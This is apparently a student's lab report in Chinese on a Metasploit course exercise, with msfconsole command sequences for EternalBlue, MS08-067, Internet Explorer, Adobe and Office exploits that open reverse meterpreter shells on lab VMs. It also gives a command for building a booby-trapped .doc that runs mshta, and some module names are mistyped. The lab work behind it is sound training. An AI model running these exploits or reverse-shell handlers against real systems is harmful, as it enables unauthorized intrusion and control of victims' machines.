本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。 具体需要完成:
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。
用自己的话解释什么是exploit,payload,encode。
在我看来,exploit是payload的载体,用来将有效载荷从攻击机发送到靶机上,payload才是真正实施攻击的部分。
Metasploit是一款开源的安全漏洞检测工具,Metasploit Framework (MSF) 在2003年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、shellcode 编写和漏洞研究提供了一个可靠平台。这种可以扩展的模型将负载控制(payload)、编码器(encode)、无操作生成器(nops)和漏洞整合在一起,使 Metasploit Framework 成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的 shellcode ,并且不断更新。
2.1.1 ms17_10_eternalblue(成功)
攻击:kali(172.20.10.2)
靶机:① Windows XP SP3(172.20.10.5)② Windows 2k(172.20.10.7)
③ Windows Server 2008(172.20.10.3)
模块:exploit/windows/smb/ms17_010_eternalblue
载荷:windows/x64/meterpreter/reverse_tcp
use exploit/windows/smb/ms17_010_eternalblue //选择攻击模块
show payloads //显示可用攻击载荷
set payload windows/x64/meterpreter/reverse_tcp //设置tcp反向连接
info //查看需要配置的信息及可攻击的target
set rhost 172.20.10.5 //设置靶机IP
set lhost 172.20.10.2 //kali IP
set lport 5223 //设置攻击端口
set target 0 //设置靶机
exploit //发起渗透攻击
(1)靶机 ① Windows XP SP3(172.20.10.5)——失败
(2)靶机 ② Windows 2k(172.20.10.7)——失败
(3)靶机 ③ Windows Server 2008(172.20.10.3)——成功
2.1.2 ms17_10_psexec(成功)
攻击:kali(10.1.1.189)
靶机:Windows XP SP3(10.1.1.243)
模块:exploit/windows/smb/ms17_10_psexec
载荷:windows/x64/meterpreter/reverse_tcp
靶机 Windows XP SP3(10.1.1.243)——成功
2.1.3 ms08_067_netapi(成功)
攻击:kali(172.20.10.2)
靶机:① Windows XP SP3(172.20.10.3) ② Windows 2k(172.20.10.7)
模块:exploit/windows/smb/ms17_10_psexec
载荷:generic/shell_reverse_tcp
(1)靶机 ① Windows XP SP3(172.20.10.3)——失败
载荷:windows/x64/meterpreter/reverse_tcp
(2)靶机 ② Windows 2k(172.20.10.7)——成功
载荷:windows/x64/meterpreter/reverse_tcp(失败)
载荷:generic/shell_reverse_tcp(成功)
2.1.3 ms15_020_shortcut_icon_dllloader(失败)
攻击:kali(10.1.1.189)
靶机:Windows XP SP3(10.1.1.243)
模块:exploit/windows/smb/ms15_020_shortcut_icon_dllloader
载荷:generic/shell_bind_tcp
2.2.1 ms10_002_aurora(成功)
攻击:kali(10.1.1.189)
靶机:① Win7 x64(10.1.1.117) ② Windows XP SP3(10.1.1.144)
模块:exploit/browser/ms10_002_aurora
载荷:windows/x64/meterpreter/reverse_tcp
(1)靶机 ① Win7 x64(10.1.1.117)——失败
(2)② Windows XP SP3(10.1.1.144)——成功
(https://img2018.cnblogs.com/blog/1047360/201904/1047360-20190421035007079-58335045.png)
2.2.2 ms10_018_ie_behaviors(成功)
攻击:kali(10.1.1.189)
靶机: Windows XP SP3(10.1.1.144)
模块:exploit/browser/ms10_018_ie_behaviors
载荷:windows/x64/meterpreter/reverse_tcp
2.2.3 ms11_003_ie_css_import(成功且唯一)
攻击:kali(10.1.1.189)
靶机: Win7 x64(10.1.1.117)
模块:exploit/browser/ms11_003_ie_css_import
载荷:windows/x64/meterpreter/reverse_tcp
2.2.4 ms14_064_ole_code_execution(成功且唯一)
攻击:kali(10.1.1.189)
靶机:Windows XP SP3(10.1.1.144)
模块:exploit/browser/ms14_064_ole_code_execution
载荷:① windows/x64/meterpreter_reverse_tcp ② windows/x64/meterpreter_reverse_http
(1)载荷 ① windows/x64/meterpreter_reverse_tcp
(2)载荷 ② windows/x64/meterpreter_reverse_http
2.2.5 失败测试
(1)ms10_046_shortcut_icon_dllloader
(2)ms14_012_cmarkup_uaf,ms14_012_textrange
① 模块 ms14_012_cmarkup_uaf
② 模块 ms14_012_textrange
(3)ie_setmousecapture_uaf,ms13_080_cdisplaypointer
① 模块 ie_setmousecapture_uaf
② 模块 ms13_080_cdisplaypointer
2.3.1 adobe_collectemailinfo(成功且唯一)
攻击:kali(10.1.1.189)
靶机:Windows XP SP3(10.1.1.243)
模块:① windows/fileformat/adobe_cooltype_sing ② windows/fileformat/adobe_collectemailinfo
载荷:windows/x64/meterpreter_reverse_tcp
(1)模块 ① windows/fileformat/adobe_cooltype_sing——失败
(2)模块 ② windows/fileformat/adobe_collectemailinfo——成功
msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
msf exploit(handler) > set LHOST 10.1.1.189 //攻击机ip
msf exploit(handler) > set LPORT 5223 //攻击端口固定
msf exploit(handler) > exploit
2.3.2 office_ms17_11882(成功)
攻击:kali(10.1.1.189)
靶机:① Win10(10.1.1.126) ② Windows XP SP3(10.1.1.144)③ Win7 x64(10.1.1.194)
模块:windows/fileformat/office_ms17_11882
载荷:windows/x64/meterpreter_reverse_tcp
(1)靶机 ① Win10(10.1.1.126)——失败
(2)靶机 ② Windows XP SP3(10.1.1.144)——失败
看到有另外的教程说要利用工具Command43b_CVE-2017-11882.py在kali中生成.doc文件再传送
使用以下命令:python <路径>\Command43b_CVE-2017-11882.py -c "mshta <链接>" -o test.doc
(3)靶机 ③ Win7 x64(10.1.1.194)——成功
2.4.1 arp_sweep(成功)
攻击:kali(10.1.1.189)
靶机:10.1.1.0/24(网段)
模块:scanner/discovery/arp_sweep
2.4.2 http/cert(成功且唯一)
攻击:kali(10.1.1.189)
靶机:10.1.1.1-20(网段)
模块:scanner/http/cert
2.4.3 protscan/syn(成功)
攻击:kali(10.1.1.189)
靶机:Win7 x64(10.1.1.194)
模块:scanner/protscan/syn
(1)在exploit时提示地址占用
(2)msf启动数据库失败
msfdb init
初始化(自动配置)原文:https://www.cnblogs.com/moddy13162201/p/10677079.html